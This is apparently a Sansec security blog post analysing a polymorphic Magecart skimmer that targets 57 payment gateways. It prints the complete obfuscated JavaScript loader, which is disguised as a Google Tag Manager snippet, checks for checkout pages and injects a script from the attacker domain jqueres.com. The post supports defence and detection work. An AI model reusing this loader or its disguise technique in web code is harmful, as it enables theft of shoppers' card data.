57 payment gateways from Germany to Brazil targeted

Sansec discovered a polymorphic skimmer that works with 57 different payment gateways. It has global reach, affecting payment systems from Germany to Brazil. It is by far the most advanced skimmer to date.

This skimmer consists of two components: a polymorphic loader, and a sophisticated exfiltration mechanism that supports dozens of payment gateways.

The skimmer uses jqueres.com as bootloader and exfiltration server. The domain points to a Ukraine-registered server. The loader has been injected into dozens of stores, with Puma Australia being the latest case.

Dozens of payment gateways supported

The actual exfiltration code (readable copy) shows extensive research. It contains adapters for 57 payment gateways. Apart from the major ones such as Stripe, it also supports local payments, from Australia to Germany to Brazil. Effectively, this skimmer can be injected in various checkout pages and not require manual modification by the perpetrator.

Among the 57, these popular payment gateways can be identified:

• Adyen (NL)
• Stripe (US)
• Pin Payments (AU)
• eWAY Rapid (AU)
• Heidelpay (DE)
• Generic CC payment
• Fat Zebra (AU)
• Radweb (UK)
• Braintree (US)
• Pagar.me (BR)
• Cryozonic Stripe (UK)
• Cartoes (ES)
• Authorize.Net (US)
• Cielo (BR)
• Secure Trading (UK)
• Paymetric (US)
• Moip (US)
• Ebanx (BR, MX)
• MundiPagg (BR)
• PagSeguro (BR)
• Payment Express (AU)

A polymorphic loader

Skimmers are in the business of hiding their code well. It's trivial to render code unreadable (using code obfuscators) but the very presence of unreadable code is clearly suspicious. So an alternative strategy is to mimick legitimate code, such as Google Analytics. However, these hand-crafted impersonations are easy to locate, once you have identified one. And a professional skimmer does not want all of his "properties" exposed whenever a single instance is discovered.

The skimmer's solution is to use polymorphic code. The Jqueres loader (below) contains redundant decoy words such as selectDuration, pickFooter, optEmbed.

(function (w, d, s, l, i) {
  w[l] = w[l] || [];
  w[l].push({ "gtm.start": new Date().getTime(), event: "gtm.js" });
  var f = d.getElementsByTagName(s)[0],
    j = d.createElement(s),
    dl = l != "dataLayer" ? "&l=" + l : "";
  j.async = true;
  j.src = "https://www.googletagmanager.com/gtm.js?id=" + i + dl;
  var keyProc = null,
    innerMeta = [
      "1f1612164c041c515b1509011f0d03",
      "13101206530e1946",
      "1f161215590609",
      "1f1612164c041c",
      "161105005b090951581f1f1e",
      "031d14104a040f5a56130105050c",
      "191c120650040f595c051e1c1d",
      "1f0b140d5d02075d4604",
      "00191004550402465c",
      "1f1c12085d",
      "161d140d591341515c1d1a1811",
    ],
    optEmbed = -1,
    pickFooter = function (s, k) {
      var r = "",
        c = null,
        x = null;
      for (var i = 0, j = 0; i < s.length; i += 2, j++) {
        if (j == k.length) j = 0;
        x = parseInt(s[i] + s[i + 1], 16);
        r += String.fromCharCode(x ^ String(k[j]).charCodeAt());
      }
      return r;
    };
  var revSolution = pickFooter("130a12044c04295e561d0f0404", "pxwe8al23pjj"),
    sortResult = pickFooter("031b050c4815", "pxwe8al23pjj"),
    attrTooltip = pickFooter("031d03244c151e5b51051e0f", "pxwe8al23pjj"),
    selectDuration =
      window[pickFooter("1c1714044c08035c", "pxwe8al23pjj")][
        pickFooter("0019030d56000157", "pxwe8al23pjj")
      ],
    receiveEndpoint = pickFooter("19161300402e0a", "pxwe8al23pjj");
  var resAgreement = pickFooter("030a14", "pxwe8al23pjj"),
    toggleScale = document[pickFooter("181d1601", "pxwe8al23pjj")],
    licenseMaximum = pickFooter("1108070056052f5a5a1c0e", "pxwe8al23pjj");
  for (var i = 0; i < innerMeta.length; i++)
    if (
      selectDuration[receiveEndpoint](
        pickFooter(innerMeta[i], "pxwe8al23pjj")
      ) !== optEmbed
    ) {
      keyProc = document[revSolution](sortResult);
      keyProc[attrTooltip](
        resAgreement,
        pickFooter(
          "180c03154b5b431d59011f0f021d044b5b0e011d59034506191a580f491409404a5d5b4441485957160c055c1d1a19",
          "pxwe8al23pjj"
        )
      );
      toggleScale[licenseMaximum](keyProc);
      break;
    }
})(window, document, "script", "dataLayer", "GTM-WYRDH");

However, a global search for the structure of this code (instead of the actual object names) yields dozens of similar cases. They contain plausible but completely made-up keywords such as:

• googleLabel
• updMsg
• propVersion
• cachefooter
• sortproc
• subCatalog
• sumMenu
• onClipboard
• optViewport
• targetscope
• appendtooltip
• setupScreen
• strictheight
• hashProcedure

Nevertheless, in all cases the loader tests for "checkout" in the current adddress and injects an extra script source for jqueres.com/js/lib/jquery-1.10.2.min.js. Given a whitelisted referrer, this address serves the exfiltration code. Otherwise, an innocuous decoy is served.

What does this all mean

The sophistication of this skimmer clearly demonstrates the automated workflow of skimmers. It also suggest a collaborative effort: there is no way that a single person could study all of these localized payment systems in such detail.

Effectively, it is a sign of the maturity of the online skimming industry, which is here to stay for a while.

How to prevent or mitigate a Magecart attack

New attack methods are literally discovered every week. Whenever a new attack pattern emerges, it usually takes 6 to 12 hours before stores across the globe are getting exploited. Because the timeframe is so small, you need an automated solution to identify and prevent attacks. Our eComscan threat and vulnerability monitor does just that. It is optimized for Magento and is the best protection that exist for merchants today. Get a copy here.

Read more

• Persistent Magento backdoor hidden in XML
• Sansec joins forces with Google's VirusTotal
• Sansec and Europol counter online skimming
• Magento wish list exploit bypasses WAF protection
• Is your store’s newsletter being used for phishing?